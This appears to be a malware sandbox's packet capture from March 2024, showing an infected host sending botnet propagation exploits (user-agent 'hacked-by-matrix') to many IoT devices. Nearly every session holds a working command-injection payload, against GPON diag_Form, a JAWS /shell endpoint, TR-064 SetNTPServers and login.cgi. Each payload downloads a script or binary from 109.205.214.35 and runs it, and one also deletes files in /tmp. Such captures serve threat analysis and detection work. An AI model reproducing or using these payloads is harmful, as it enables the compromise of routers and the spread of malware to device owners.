                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        816192.168.2.135808842.133.112.87443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.657093048 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        817192.168.2.1333474212.227.187.65443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.657099009 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        818192.168.2.1333616212.207.148.182443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.657118082 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        819192.168.2.1335910212.216.234.23443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.657136917 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        820192.168.2.134989665.8.233.11580
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.696065903 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:00.401329994 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:01.196228027 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:01.327524900 CET927INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"><TITLE>ERROR: The request could not be satisfied</TITLE


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        821192.168.2.1347284104.128.126.1817547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.726301908 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:03.852247000 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:09.996239901 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:22.032526016 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:47.116219997 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        822192.168.2.136028654.177.83.25180
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.726356030 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:22:59.888607025 CET146INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        823192.168.2.1346112174.18.63.1127547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.756316900 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        824192.168.2.135652299.246.84.2367547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.847436905 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        825192.168.2.133840424.217.75.747547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.857984066 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        826192.168.2.1347364104.128.126.1817547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.883368015 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:00.716240883 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:01.676228046 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:03.596302032 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:07.436234951 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:15.117609978 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:30.476241112 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        827192.168.2.1346196174.18.63.1127547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.931921005 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:00.509355068 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        828192.168.2.133475018.238.110.22680
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.932399988 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:00.844244957 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:01.932235956 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:02.092746973 CET1275INHTTP/1.1 400 Bad Request
                                                        Server: CloudFront
                                                        Date: Thu, 21 Mar 2024 04:23:02 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 915
                                                        Connection: close
                                                        X-Cache: Error from cloudfront
                                                        Via: 1.1 cb00aab410567636a8e650a8ebc7d9be.cloudfront.net (CloudFront)
                                                        X-Amz-Cf-Pop: PHX52-P2
                                                        X-Amz-Cf-Id: OGnoFKIMDHPsoEaeEKOKuGrFV-vo16HamIN0GLVBVUVCEe2F8fiwxA==
